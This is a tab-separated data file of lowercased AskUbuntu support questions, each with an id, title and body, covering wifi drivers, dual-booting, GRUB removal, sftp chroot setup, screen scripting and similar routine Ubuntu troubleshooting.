410111	how do i change the drivers for an intel centrino wireless-n 130 wifi card ( 12.04.4 ) ?	my wifi signal disconnects at random . everyone else 's computer on the network works well , so it 's not a network fault . it works well on windows so it 's not a hardware fault . relevant lspci output : 02:00.0 network controller [ 0280 ] : intel corporation centrino wireless-n 130 [ 8086:0896 ] ( rev 34 ) subsystem : intel corporation centrino wireless-n 130 bgn [ 8086:5005 ] flags : bus master , fast devsel , latency 0 , irq 44 memory at e1500000 ( 64-bit , non-prefetchable ) [ size=8k ] capabilities : kernel driver in use : iwlwifi kernel modules : iwlwifi i tried downloading the latest 3.2+ drivers from the intel website , called iwlwifi-6000g2b-ucode-18.168.6.1.tgz , and replaced the file in /lib/firmware , but it did n't help . what else can i do ? there are many conflicting suggestions on the internet , i tried doing the fix where i made an entry in a new filemodprobe.d/iwlwifi.conf to switch of i1n network , but that simply disabled all wifi support when i rebooted .
410114	how do i download using torrents ?	i am trying to download a file using the bittorrent protocol but i ca n't get my browser to open the magnet link in my torrent client . i have qbittorrent installed but i still ca n't seem to download from magnet links . a little box always shows up asking what application i want to use and there is a button that says `` browse '' but i ca n't choose anything . how can i use such links on ubuntu ? and when you go to explain , please explain every detail as if you are talking to someone who does n't know anything about ubuntu .
410115	trouble installing ubuntu on a secondhand ibm server	i recently picked up a secondhand ibm x365 , and i want to install ubuntu on it . i 've installed ubuntu on countless personal computers , but never before on a server . i made my bootable disc ( i have a bunch , ranging from ubuntu desktop 10.04 up to ubuntu server 12.10 , in both 32 and 64 bit ) , put it in my server 's cd drive , went to bios , configured it to boot to cd-rom , then the diskette drive , then hard disk 0 , then the network . every time i start it up , it skips right over everything without displaying anything on screen , then shows me a graphic of a floppy disk and an indication to press the f1 key . i think it 's either a bad cd drive or has something to do with the raid controllers or something . i 've never used raid before , so i would n't know what to look for there . anybody have any suggestions for what to try next ?
410118	mblaze gives error label empty	i was able to follow instruction that you provided to connect mblaze . created new mobile connection selected mblaze and follows . it connects show me signal bar . but unable to open any web site in firefox . as it gives label empty error in connection option . using latest ubuntu 13. please help .
410125	bridge wireless connection from osx 10.8 to ubuntu 12.04 lts	i have a mac running osx 10.8.2 that is connected to a wireless network . my ubuntu 12.04 lts box has no internet capability atm ( wired network down ) . i would like to bridge the connection on my mac such that i can access the internet via my ubuntu box . i have a flash drive to get software from the mac to the ubuntu box if necessary . is there a way to do this ?
410126	no window decoration around nautilus windows in ubuntu 13.10	i updated my ubuntu and after window boarders for nautilus has been disappeared and the menu items that are on the unity top bar does not work . menus are still there but you can not click on them but shortcut strokes still functioning . i checked some of the solutions from internet but none of them worked . any suggestion or further comment is appreciated ? here is the current state of nautilus window :
410127	usb support with virtualbox	this is n't really a question but more like my frustration and criticism - after spending countless hours , searching web for answer , there seems to be a lot of confusion about the virtual box versions i.e . ose - pueland i still do n't know which version i am using , i mean i know it is 4.3.6r91406 but which one here is one post here describing steps to install which is exactly what i followed puel and 2nd post here saying it is only possible with ose and 3rd post suggesting different solution altogether here i still managed to use usb support with vm , without deleting or installing - i used usb as it is now . so , what is criteria for maintaining these forums and who does it ? or may be i did not use it the way it is meant to be ? !
410129	certain programs wo n't open	ubuntu fails to start the following applications : viz skype firefox thunderbird chrome when i try opening mozilla firefox or thunderbird it says `` firefox is alresdy running , but not responding . to open a new window you must first close the exsiting firefox process , restart your system . also neither of the libre applications run .
410130	i get the changelog when upgrading using apt-get	i am getting a weird issue when running apt-get update & & apt-get upgrade this is on ubuntu server 13.10 how can i correct this ?
410134	change folder icons in ubuntu-mono-dark theme	i 'm running 13.10 with unity , and i have a `` problem '' : i 'm using nemo , because i prefer it over nautilus ( for obvious reasons imo ) , and it works really great . the drawback of nemo is , that it is kind of ugly ; so i want to change the icons of the folders . that 's not a problem at all , using unity-tweak-tool , to change for example to one of the icon-themes which are delivered by this ppa . the thing is , although this works great , and the icons change , the problem is , that all of the icons change , including my applications in the tray , and application icons in the dash . can i modify the theme in such a way , that only the icons for the folders change , and nothing else ? so e.g . delete everything in the ~/.icon/ < theme-name > / folder except places and `` inherit '' everything else from the default ubuntu-mono-dark theme ?
410135	problem with region-free and multiregion dvds	i 've got some problems with playing dvds , which i described here : unable to play dvd movies . being hopeless i purchased the newest fluendo dvd player . however , it turned out that i am unable to play dvds which are not region 2 . that means , that when i 've got original dvd with region 2+4 or region 0 my computer is unable to play them . i am using current version of ubuntu 13.10 with all updates already installed . technical data about my hardware/software interactions are in linked topic . do you have any ideas how this problem could be solved ? best wishes , kuba
410136	ubuntu unmounting drive takes forever	i have ubuntu 12.04 and when i try to unmount a drive after copying data , the writing data to device takes forever , maybe as long and the copy process ? this is another thread about this : unmounting drive in xubuntu as an explanation , i am backing up a file server using rsync , specifically grsync , one large folder at a time . so i finish a 1 tb backup which may take a full day or 24 hours ( many small files ) , simply unmounting the drive can take hours or days when it says it is `` writing data to disk '' . if i kill it then i get file system errors and have to fix them in windows which takes a while . i tried different disks with similar results . it seems that ubuntu either does not write or just writes poorly and/or causes file-system errors . is it possible to stop this , maybe disable write-back cache or something , just to make sure when i write something to disk , it is written completely without needing to write more when un-mounting . thank you .
410137	error when start tor	i have a problem that mean i ca n't start tor , it display to me that message : '' jan 24 16:25:02.640 [ warn ] /root/tor/data/tor is not owned by this user ( root , 0 ) but by < unknown > ( 1000 ) . perhaps you are running tor as the wrong user ? jan 24 16:25:02.640 [ warn ] failed to parse/validate config : could n't access/create private data directory `` /root/tor/data/tor '' jan 24 16:25:02.641 [ err ] reading config failed -- see warnings above. `` i run tor as root and i modified the code just like this tutorial : http : //cyruslab.net/2012/11/16/the-tor-browser-bundle-should-not-be-run-as-root-exiting/ i need some help : ) sorry for my poor english , thank in advance
410139	ubuntu is locking	or just install the operating system ubuntu 12:04 wibe with , or performed all the procedures , i 'm going to restart , i choose ubuntu and the system goes , but then when i go to the screen where we wrote to put the password lock screen appears and everything purple , aiutarmiii you ?
410141	how to disable bottom notification panel in gnome 3.8	how to disable bottom notification panel ( not notifications just panel , i do n't want it to appear when i hover with mouse over bottom side of screen ) . i want to use docky on bottom side , but sometimes i hover over the bottom edge and then notification panel appear , it 's really annoying .
410142	what version of ubuntu support switchable graphics ?	i have an hp with inter and ati and i want to have ubuntu on my notebook . i have installed the version 12.04 and i didnâ´t found any driver for my graphic card : ( what is the version that i need to install to have my pc wotking with full hardware ? thanks : d
410143	why booting using pendrive linux say 'ca n't find live medium file ' ... what do i do ?	it says it cant find a medium containing a live file . ( i 'm trying to boot alongside windows xp ) i 've tried the pendrive thing they suggest on the website , and i 've tried the ubuntu installer on the website also . after waiting 9 hours for the ubuntu installer to finish it says there was an error ; ca n't complete installation . what can i do to fix this ? thankyou
410145	zeal from the ppa has unmet dependences	i 'm trying to install zeal through ppa in ubuntu 13.04 , but is giving the error : the following packages have unmet dependencies : zeal : depends : libqt5core5 ( > = 5.0.2 ) but 5.0.1+dfsg-0ubuntu4.1 is to be installed depends : libqt5gui5 ( > = 5.0.2 ) but 5.0.1+dfsg-0ubuntu4.1 is to be installed depends : libqt5network5 ( > = 5.0.2 ) but 5.0.1+dfsg-0ubuntu4.1 is to be installed depends : libqt5sql5 ( > = 5.0.2 ) but 5.0.1+dfsg-0ubuntu4.1 is to be installed depends : libqt5widgets5 ( > = 5.0.2 ) but 5.0.1+dfsg-0ubuntu4.1 is to be installed depends : libqt5xml5 ( > = 5.0.2 ) but 5.0.1+dfsg-0ubuntu4.1 is to be installed e : unable to correct problems , you have held broken packages . i tried to install qt5-qtwebkit but keeps the same error . any clue what could be ?
410154	elementary xfce theme icons not working in nautilus	the theme does n't show the correct icon for some filetypes , like .txt , .h and .cpp . as you can see in the file property the icon file exist and is selected but is not showed under nautilus . i am using ubuntu 13.10 .
410156	what happens when i install ubuntu ?	i have a windows 8 laptop and i am interested in downloading and installing ubuntu 12.04.3 , but what happens next ? can i change back to my old desktop ? how do i use ubuntu ? please i need advice
410157	having trouble with partition while dual booting ubuntu 13.10 and windows 7	so i have already made a partition of 100 gb in windows but when i loaded ubuntu 13.10 from a usb stick and tried installing it ubuntu did n't give me the option of installing along side windows . when i clicked something else and then clicked on 100 gb free disk space it still would n't let me . this is the first time for me to install a new os so simple anwers would be the best .
410166	where can i find the correspondent of `` temp '' folder in firefox ?	if i 'm right , if i play a video on youtube , when i 'm using firefox on a windows machine , the browser stores the video file in the temp folder . so , theoretically , i should find that video already downloaded in the temp . but i do n't know how to find in linux the correspondent of the `` temp '' folder . i have tried in the `` etc '' folder but got nothing useful . do you have any ideas how to sort this out ? yesterday i have been playing a video on youtube all day long , and now i see it 's gone `` for copyright infringement , blah-blah '' , but i think the played file should be `` hiding '' somewhere on my system , only if i could get to it somehow ... can you help me with this ?
410168	any way to enable google drive search in dash without other online results ?	as you probably know , ticking the `` do not include online results '' option in security and privacy prevents the google drive scope from returning results ; unticking it opens the floodgates and provides results from soundcloud , duckduckgo , etc . etc. , even though i do n't have any other online scope packages installed . is there any officially supported way to selectively enable only certain online results ( in my case , only google drive ) ? uninstalling the packages i do n't want does n't seem to be doing it ...
410171	non-deterministic behaviour in bash script for screen window opening and naming	i have the following bash script to set up a screen session with four windows from the command line in 13.10 . comments indicate what i think it ought to do . screen -dms mysession # start screen , name the session 'mysession' screen -s mysession -p 0 -x exec echo -ne `` \ekserver\e\\ '' # name the first window 'server' screen -s mysession -p 0 -x exec screen # start a second window screen -s mysession -p 1 -x exec echo -ne `` \ekvim 1\e\\ '' # name second window 'vim 1' screen -s mysession -p 1 -x exec screen # start a third window screen -s mysession -p 2 -x exec echo -ne `` \ekvim 2\e\\ '' # rename third window 'vim 2' screen -s mysession -p 2 -x exec screen # start a fourth window screen -s mysession -p 3 -x exec echo -ne `` \ekconsole\e\\ '' # name fourth window 'console' every second or third time i run it , i get exactly what i want : four windows , each named as i have them here . the rest of the time i get anywhere between one and four windows , some of them named correctly , other times with the default , 'bash ' name . why am i seeing this behaviour , and how do i fix it ? between each time i run it i make sure the screen session has ended , by typing exit in each window and checking screen -ls to see that there are no screen sessions active . outcome : from the comment by `` chris '' on this page i now have a project specific dotfile that i invoke from .screenrc using source .projectscreenrc - when the file is present it contains screen -t commands as suggested in glenn jackman 's answer . when it is not present screen runs as normal . i 'm still not sure why this works and why my original approach did n't , but this is much cleaner .
410174	fan noise after windows 8 dualboot ubuntu 12.04	i decided to dualboot ubuntu 12.04 lts on a laptop with preinstalled windows 8 . after some work i got both running . after the install the fans became alot louder ( in both ubuntu and windows 8 ) . so i decided to go back to only windows 8 by restoring from factory settings . i did this , but the noise is still here . i can see that ubuntu still is an boot option in uefi ( bios ) . so my questions are : 1 ) how do i remove the grub loader completely ( ive tried fixmbr and fixboot ) ? 2 ) why is there suddenly more noise from the fans and can i fix it ?
410177	which desktop environment has ( or can have ) global menus ( apart from unity ) ?	in unity global menus auto-hide , which is completely nuts . â but in general i like the functionality for maximized windows ( as long as it doesnât disappear ) . which de can do global menus and has them : permanent ( no timeout ) for maximized windows only ?
410180	where can i find introductory material for using the command line ?	i 've been very interested in linux for a while now and finally decided to install ubuntu on my machine . i was wondering is there any sites or pdfs links were i could get an intro into running terminal commands . i 've looked around and ca n't find anything on really all around tips and commands to learn for ubuntu . any other tips for a beginner would also be helpful .
410181	ubuntu 13.10 disable bluetooth at startup	what is a easy way to disable blue-tooth at start up with ubuntu 13.10 .
410182	firefox 26 unable to load some websites ?	when using the new version of firefox ( 26 ) , some websites can not load like in the last version i was using ( 23 ) . this specific problem happens only in my ubuntu box . i have a windows box with the same firefox version , and everything is just fine . the problem for me is in the design , css and ajax functions does not load properly , some flash websites are the same , some interfaces functionaly just does not work as expected . trying those sites with the same firefox version in another linux distro or windows works perfectly . what could it be ?
410183	problems with amd drivers . after logging in computer will not display unity interface	i recently built my first computer and installed ubuntu since i am short on cash . for the last year i have been using ubuntu on my laptop , and have not had trouble with it . when i installed on my desktop , i decided i would run a game or two on steam to see how it ran under load . as soon as i started the first game up . it blackscreened and i had to reset , after that it booted into login , and keeps black screening . any fix ? specs : cpu : amd athlon ii 760k gpu : amd radeon r9 270x ram : gskill sniper 1600 2x4gb
410188	why do vmware tools not let me enlarge my screen ?	i installed a virtual machine using vmware . i installed ubuntu 12.04 and upgraded to kubuntu 13.10 . works well so far . then i installed the vmware-tools to get a large screen . seems to install nicely , no errors or nothing , i rebooted but my screen stays small ( 640x480 ) . how do i get a larger screen ?
410190	how to build curl on ubuntu ?	how do i build curl on ubuntu ? i am using this download location for the sources.. http : //curl.haxx.se/download.html when i try to run the simple http client given here .. http : //curl.haxx.se/libcurl/c/simple.html the compiler has never heard of the curl functions the program uses.. i ran ./configure make make install
410195	problem in installing ubntu	i have a toshipa laptop satallite ... i itried to download xubuntu in it using a software that gives you a virtual flash disk .. causei did n't have one .. after that i followed the steps of installing .. . the computer was restarted / i shut it down and turn it on .. it showed the installation of xubuntu stoppeed showing me a message that has ( ( âunable to find a medium containing a live file systemâ ) ) tried then to get the xubntu iso file in a dvd disc .. tried to install it showed me the same message .. tried to insert a flash disc containing the iso file .. got the same message why do you think this thing is happening ? ? ! ! plus how could i go to to bios menu and choose to boot from windows7 that is already in the computer before trying to install the ubntu ? ? ? someone tell how could i reach the bois to boot from the windows that i have.. and fix the things using it .. or tell me how could i install the x-ubuntu in a right way because i am stuck important info that might help you find out i downloaded the older 32bit version of ubntu iso even though i has a newer machine ..
410196	remove first n lines of a large text file	i need to remove the first 42 lines of a 2gb sql dump . i know i can view the first lines using : head -n 44 dump.sql but is there anyway to edit or remove them ?
410198	dual installing windows 8.1 : ca n't boot from windows dvd	i 'm trying to get my ubuntu to dual boot windows 8.1 . i modified the partitions , but now when i try to boot the windows dvd , it just goes straight to ubuntu . i tried setting my boot priority to dvd drive first but it did n't help . i am using an hp pavilion slimline s3500z .
410201	windows vista email ( .eml ) files - how to open in thunderbird	i am new to linux/ubuntu , just 3 days . i installed it when windows vista crashed due to a very bad virus . ubuntu is working very well but i would like to know how to put my emails from windows mail backups in a format i can use in thunderbird . while in windows i was not able to export them in an `` importable '' format ( vcard or txt ) but i can read them in ubuntu by double clicking on them . the problem is to know the author , date , subject etc . thanks in advance to anyone who can help .
410205	ubuntu wifi issue	i have installed ubuntu 12.04 and the wifi was working well but after i get the updates and restart my pc the wifi stop working my wifi device is `` broadcom 4313gn 802.11b/g/n 1x1 wi-fi adapter ''
410212	user friendly ubuntu distribution for old powerbook g4 15 ''	i have mac pb g4 15 '' 1.5 with 512mb ram , and need to use it office style , maybe some graphic processing but nothing fancy , i need , a user friendly distribution that could bring out the best of this nice machine .
410218	how to close an open port in ubuntu 12.04 ?	i need a command to list all open ports in my pc , and another command to close a port . any suggestions ? i need to close some applications ' port .
410221	sound stopped and i must reboot to make it work again	when i bood the computer the sound works well , but after i suspend one or two times , then sound stop working . pulseaudio -vvvvv i : [ pulseaudio ] main.c : setrlimit ( rlimit_nice , ( 31 , 31 ) ) falló : operación no permitida i : [ pulseaudio ] main.c : setrlimit ( rlimit_rtprio , ( 9 , 9 ) ) falló : operación no permitida d : [ pulseaudio ] core-rtclock.c : timer slack is set to 50 us . d : [ pulseaudio ] core-util.c : realtimekit worked . i : [ pulseaudio ] core-util.c : successfully gained nice level -11 . i : [ pulseaudio ] main.c : esto es pulseaudio 4.0 d : [ pulseaudio ] main.c : host de compilación : i686-pc-linux-gnu d : [ pulseaudio ] main.c : compilación cflags : -g -o2 -fstack-protector -- param=ssp-buffer-size=4 -wformat -werror=format-security -wall -w -wextra -pipe -wno-long-long -wno-overlength-strings -wunsafe-loop-optimizations -wundef -wformat=2 -wlogical-op -wsign-compare -wformat-security -wmissing-include-dirs -wformat-nonliteral -wpointer-arith -winit-self -wdeclaration-after-statement -wfloat-equal -wmissing-prototypes -wredundant-decls -wmissing-declarations -wmissing-noreturn -wshadow -wendif-labels -wcast-align -wstrict-aliasing -wwrite-strings -wno-unused-parameter -ffast-math -wp , -d_fortify_source=2 -fno-common -fdiagnostics-show-option d : [ pulseaudio ] main.c : ejecutándose en el host : linux i686 3.11.0-15-generic # 23-ubuntu smp mon dec 9 18:16:27 utc 2013 d : [ pulseaudio ] main.c : se encontraron 2 cpus . i : [ pulseaudio ] main.c : el tamaño de la página es de 4096 bytes d : [ pulseaudio ] main.c : soporte para compilar con valgrind : no d : [ pulseaudio ] main.c : ejecutándose en modo valgrind : no d : [ pulseaudio ] main.c : ejecutando en mv : no d : [ pulseaudio ] main.c : build optimizado : si d : [ pulseaudio ] main.c : fastpath definido , solo se desactivan las comprobaciones fast path . i : [ pulseaudio ] main.c : el id de la máquina es 0b8080c47e0b8c2a7648aa695179af88 i : [ pulseaudio ] main.c : el id de la sesión es c2 . i : [ pulseaudio ] main.c : utilizando directorio de tiempo de ejecución /run/user/1000/pulse . i : [ pulseaudio ] main.c : utilizando directorio de estado /home/jose/.config/pulse . i : [ pulseaudio ] main.c : utilizando directorio de módulos /usr/lib/pulse-4.0/modules . i : [ pulseaudio ] main.c : ejecutándose en modo de sistema : no e : [ pulseaudio ] pid.c : daemon already running . e : [ pulseaudio ] main.c : failed pa_pid_file_create ( ) . i used pavucontrol and when i play a video or a song , i can see se sound bar moving but i can not hear anyting .
410222	weight of the commentaries in the source code	when i search for source-code of linux parts ( applications , kernels , ... ) , i often find commentaries to clarify the code . now , i know that those commentaries are useful to help a human reading the code , but i was wondering about the impact they have on the machine . the commentaries are n't read by the machine , but i 'm assuming the machine must at least read the first character of the line to know if it needs to read it or not : machine - `` does this line start with a # ? yes , ok , moving on ! uh , another line , does this one start with a # ? no ! ! aha , let 's read that mo****er ! '' so , my question is : do the commentaries in the source-code slow down the machine ( in a significant way , like 0,01 % or more ) ? ps : maybe the builder which reads the code does n't include the commentaries in the final program ?
410227	new server install 13.10 default user ubuntu /home/ubuntu	i 've just done a fresh install and i 'm seeing a couple user accounts i know i did n't create.. im most interested in ubuntu user /home/ubuntu since i did not create it.. i want to control the system and make sure : 1. no one else can login 2 . if i delete the 'ubuntu ' user i 'm not breaking something . any insights ? sudo cat /etc/passwd ubuntu : x:1001:1001 : ubuntu : /home/ubuntu : /bin/bash my user account is also a member of ** sudo cat /etc/group **adm : x:4 : ubuntu dialout : x:20 : ubuntu **cdrom : x:24 : ubuntu floppy : x:25 : ubuntu **sudo : x:27 : ubuntu audio : x:29 : ubuntu **dip : x:30 : ubuntu video : x:44 : ubuntu **plugdev : x:46 : ubuntu
410228	how stable is btrfs in ubuntu ?	i see entries describing btrfs on ubuntu 12.04 has some concerns due mostly to the maturity of the btrfs product . now that we have 13.10 available , is the btrfs file system reliable ?
410229	libnss-extrausers change password	i have ubuntu 12.04 . installed libnss-extrausers and configured nsswitch.conf . now , users registered in /var/lib/extrausers/ { passwd , group , shadow } are recognized by the system and can login . however , common user management programs ( passwd , userdel , usermod , groupadd , groupmod ) only work for users registered at /etc/ { passwd , group , shadow } is there any configuration to make these programs work with libnss-extrausers , or simply recognize /var/lib/extrausers/ { passwd , group , shadow } as user data files ?
410234	ev3 usb not enumerating - next steps ?	the following is solved . not sure how to mark it so within askubuntu . i am trying to connect the lego mindstorms ev3 brick to my laptop ( running ubuntu 13.10 ) . as per http : //www.raspberrypi.org/forums/viewtopic.php ? f=28 & t=53832 i used lsusb and dmseg but the results ( below ) leave me wondering what how to isolate/troubleshoot this . any suggestions ? rex @ laptop : ~ $ lsusb bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 005 : id 0bda:58c2 realtek semiconductor corp . bus 001 device 004 : id 0bda:0129 realtek semiconductor corp. rts5129 card reader controller bus 001 device 003 : id 0a5c:21d7 broadcom corp. bcm43142 bluetooth 4.0 bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub after sudo dmesg -c and plugging the usb cable from the powered up ev3 brick , dmesg gives rex @ laptop : ~ $ dmesg rex @ laptop : ~ $ at the lejos site ( http : //www.lejos.org/nxt/nxj/tutorial/preliminaries/gettingstartedlinux.htm ) i read about the requirement for libusb . i did n't read that site thoroughly at first so i installed version 1.0 , but it seems that 0.1 is got installed as well : rex @ laptop : ~ $ dpkg -- get-selections | grep libusb libusb-0.1-4 : amd64 install libusb-1.0-0 : amd64 install libusb-dev install libusbmuxd2 install i 'm not sure what to do next , so any thoughts would be welcome . this is one of the first times i 've posted to a forum , so let me know if something about my post does n't conform to common etiquette . in case you 're wonderring , once i get the ev3 brick enumerationg , i 'll use win 7 on virtualbox to run the lego ev3 programming ide . windows 8 / 8.1 gave me the final push to ditch windows as my day-to-day os . thanks , rex [ solution ] opps ! i was simply plugging into the wrong port . for anyone else trying to do this : should use micro/mini style usb port on end of ev3 brick , not the large style usb port on the side . brick now ennumerates . within virtualbox i setup up a filter with the lego vendor id of 0694 and also an auto-field-filled filter ( i 'm in a rush ) . askubuntu will not let me post more than 2 links with out more reputation points , but see section 3.10 of the virtualbox manual . can now connect to brick via usb from within ev3 software .
410235	add resolution mode for xorg-dummy	i am trying to to add a resolution mode for x with the xorg-dummy driver to be able to fit the x11vnc server 's output to my screen resolution . i am running x11vnc -xdummy -xrandr with the x11vnc xdummy script in my path . if i do n't add a xorg.conf file in /etc/x11 then i get only a bunch of lower resolutions . therefore i added this xorg.conf file https : //www.xpra.org/xorg.conf with which i also have a number of higher resolutions . among them is 1920x1200 which i need , but rotated by 90 degrees . using http : //www.arachnoid.com/modelines/ , i therefore computed the modeline modeline `` 1200x1920_10.00 '' 27.20 1200 1192 1304 1408 1920 1921 1924 1932 -hsync +vsync and added it to the xorg.conf file together with the corresponding mode . after restarting , however , i still do n't have this mode . in my /var/log/xorg.log i see thigs like not using mode `` 1200x1920 '' ( no mode of this name ) but also not using mode `` 1920x1200 '' ( no mode of this name ) the later works in fact . the former does not . i also tried adding it with xrandr , but i get failed to get size of gamma for output default furthermore i tried supplying the mode using the argument -geom 1200x1920 to the xdummy script . this does not add the resolution either . does xorg-dummy only support the modes already specified in the sample xorg.conf or am i making a mistake ? the goal of of the exercise is to be able to switch the vnc-server resolution dynamically . i could use other vnc-servers but most of these seem to have issues related to the use of kde . kde 's own krfb is unfortunately much slower .
410239	grub on boot partition using raid0 and swap partition question	i 'm new on this linux stuff and english is n't my language so have some patience please . = ) question 1 : *when a boot partition is created during or before a installation of ubuntu , is grub bootloader automatically installed there ? * the reason for asking is that i tried to install ubuntu 13.10 on a raid0 partition using my motherboard raid function and that did n't go so well . installation could n't install grub . i then installed ubuntu server on raid0 using linux own software raid thing , and then installed ubuntu-desktop manually according to some guide . that worked , but for some reason i do n't know why , my usb-wifi did n't work in the desktop , even though it worked during ubuntu server installation . neither did i get the `` pretty '' splash-screen during boot . i plugged in another usb-wifi from netgear and that worked after manually configure my network settings . now i made a new raid0 partition using my motherboard built in function , booted into ubuntu 13.10 live-dvd and manually created 3 partition , /boot , /swap and /root using gparted . rebooted and installed ubuntu 13.10 , when installation was asking where i wanted the bootloader installed , no partition worked so i just continued by clicking on the option to not install bootloader . everything seems to work perfect now , but i still wonder why i am given the option to choose where i want bootloader installed if it install itself anyway ? question 2 : if i do n't created a separate swap partition , will ubuntu create a virtual memory in /root somewhere or will there be no virtual memory at all ?
410240	ssh not working from ubuntu 12.04 vm ( vmware )	i am using ubuntu using vmware . my host machine runs on windows . when i try to ssh into other servers it does not work . the servers are recognized and i can ping them . however when i issue ssh , it times out . i can ssh into the server from my host machine fine . i am not sure what 's going on . any help would be greatly appreciated . thank you ,
410241	removing grub completely	i decided to dualboot ubuntu 12.04 lts on a laptop with preinstalled windows 8 . after some work i got both running . after some thoughts i decided to go back to only windows 8 by restoring from factory settings . when doing this the ubuntu partitions disappeared , and windows loads like it should . but ubuntu is still a boot option in bios . if booting this , i get the grub command-line . how do i remove the grub loader completely ? ( i 've tried the windows `` fixes '' , fixmbr and fixboot but these yields no results . )
410242	problem installing ubuntu on hp n003tx	when restarting after installing ubuntu 13.10 it displays that system is running in low graphics mode.even bad that no mouse pointer is displayed . by hit and trial with touchpad , and by clicking ok even if i continue it for one session nothing is displayed except a blinking cursor.please guide me how to solve these issues so that i can enjoy linux .
410243	i lost my ownership to my personal files	i tried to link some files to plex media player and made a mistake when changing rights and ownership . i made a user named plex and gave it ( not intentionally ) all the rights and ownership of my personal files . result : i can not longer access my personal files from my normal user name . what to do ?
410244	a command to list all users ? and how to add , delete , modify users ?	i need a command to list all users in terminal . and how to add , delete , modify users from terminal . that could help in administrating your accounts easily by terminal .
410245	usb stick does not mount automatically	currently , i can not use any usb stick or external hard disk in ubuntu 12.04 via graphics user interface . while trying to mount them manually , i realized that they are actually mounted automatically at /media/usb0 , usb1 etc . however , i ca n't use the file manager to do something on the usb . i want to use file manager to copy , cut etc . in addition , while the usb is being mounted automatically , it 's symbol does not appear on the left menu ( dash home ) which prevents me to safely remove the usb easily . how will be really thankful if somebody help me on this please ? regards .
410247	how to know last time apt-get was executed ?	i known that the command to update the repository lists is apt-get update . how to check if it has been executed today or in the last 24 hours ? i do not known if should check some file timestamp . or issue another apt command . or use dpkg utility . could not find something useful at man pages .
410252	sftp chroot configuration error	can anyone see what i have done wrong in this procedure ? i can connect to the server as the new user and am in the chrooted directory , but despite setting all the proper root permissions , i can not add files or directories . sudo mkdir /var/host sudo groupadd sftp sudo useradd john -d / -m -n -g sftp -s /bin/false sudo passwd john sudo nano /etc/ssh/sshd_config match group sftp chrootdirectory /var/host forcecommand internal-sftp service ssh restart here are the directory permissions drwxr-xr-x 2 root root 4096 jan 24 14:27 host * update * ok , i think i understand now . let me know if this looks good : sudo mkdir /var/sftp sudo mkdir /var/sftp/host chown john : sftp /var/sftp/host sudo groupadd sftp sudo useradd john -d /var/sftp/host -m -n -g sftp -s /bin/false sudo passwd john sudo nano /etc/ssh/sshd_config match group sftp chrootdirectory /var/sftp/host forcecommand internal-sftp x11forwarding no allowtcpforwarding no sudo service ssh restart only problem with this solution is that only john can add files and directories i think , or can any member of sftp ?
410258	black bars after installing 12.04	just tried installing ubuntu 12.04 on my toshiba satellite s855-01k but i 'm experiencing problems after the grub menu . boots to black screen and freezes if i choose regular start up boots to black screen if i boot in recovery if i use the 'nomodeset ' fix its boots start a distorted gui with black bars across screen ect . i have no idea why it does this and sometimes it will boot apparently fine but then not work the next boot . i tried installing the amd graphics driver and thought that would fix it but the next boot it was worse ? i ca n't boot into a unusable os unless booting from a usb . whats also weird is that while booting with quiet splash ill get a notification saying basically '' /dev/mapper/cryptswap1 not found '' or something like that , was too fast could n't write it all down . is this relevant ? it gives me 2 options , s to skip mounting and m to manually repair . i 'm not looking to do anything too crazy with my os or pc just have it work , and quickly ( why i went to linux ) also i did try reinstalling a couple times . i tried to repartition my hard drive at first to keep windows but when it did n't work and windows was apparently gone i reinstalled wiping the disk .
410261	problem with gamepad	i have ubuntu 13.10 and i have problem with my gamepad i have gamepad that have buttons all messed up can i disable some buttons ? ? that my joystick does not have . so here is how it looks this is how my other joystick looks like but some times the first joystick looks like this as well . any ideas how to make it work or just disable some buttons that my joystick does not have and the software thinks i am pressing ? ?
410263	boot fails ( sometimes ) after `` switched to clocksource tsc ''	i am running on ubuntu 13.10 . i had worked on ubuntu 12.04/12.10/13.04 and linux mint 13/14/15 both 32 and 64 bit versions . i have faced with the same boot problem in all of these distros . after grub , sometimes it does not boot and i see a blinking cursor on the screen . it occurs at approximately % 50 of tryings . i have tried to boot on recovery mode to see what happens . at the last versions , there are two lines which booting is stopped after : '' switched to clocksource tsc '' or ( after this line ) '' new usb device found ... . manufacturer : generic serialnumber 20100201 ... .. '' i have tried all the methods i can find for about one year but none of them worked . what do you suggest ? my computer : lenovo z580 core i5 8gb ram 500gb hdd nvidia gt635m thanks , good days .
410264	how to view a specific command executed in terminal by time ?	i need to view a command in history by time executed in ubuntu 12.04 . so , i could know each command , the time it has been executed . that help when you want to view a command that you should execute in a specific time .
410267	how to set updates periodically ?	if i 'm tired of do apt-get update & & apt-get upgrade , how can i tell my ubuntu system to update automatically given a period of time ?
410272	is it possible to create a locked down 'dumb terminal ' with ubuntu ?	my company has a large amount of document review work that must be done manually by temp workers . the work is done on our website , accessible via vpn only . we are planning to just show scanned images of the documents on the webpages ( page by page ) , without allowing to download the document file locally . however , i am worried that a person can take a screen shot of a web page on the computer and somehow store it on usb drive or send via gmail . ( i am not worried about using a smartphone cell phone or camera to take a screenshot , let 's say the user does not have them ) my question is : has anyone configured an ubuntu installation without any 'escape routes ' for the information accessed on it via web browser ? or , to put it another way , an installation where the only thing a person can do is open a specific url in a browser and do nothing else ?
410273	error using speedfan	i 'm new to the whole linux concept . i start up speedfan and it comes up with a error and say `` privileged instruction '' . i 'm very new to this , so if someone could tell me how to fix this step by step , it would be greatly appreciated .
410278	architecture - 32-bit handling 64-bit instructions	tomasz @ tomasz-lenovo-ideapad-y530 : ~ $ lscpu architecture : i686 cpu op-mode ( s ) : 32-bit , 64-bit byte order : little endian cpu ( s ) : 2 on-line cpu ( s ) list : 0,1 thread ( s ) per core : 1 core ( s ) per socket : 2 socket ( s ) : 1 vendor id : genuineintel cpu family : 6 model : 23 stepping : 6 cpu mhz : 2000.000 bogomips : 4000.12 cache l1d : 32k cache l1i : 32k cache l2 : 3072k i can see that my architecture is 32-bit ( i686 ) . but cpu op-mode ( s ) are 32-bit and 64-bit . the question is : how come ? how is it handled that a 32-bit processor performs 64-bit operations ? i guess it 's a lot slower than native 32-bit operations . is it built-in processor functionality ( to emulate being 64-bit ) or is it software dependent ? when does it make sense for a 32-bit processor to run 64-bit operations ?
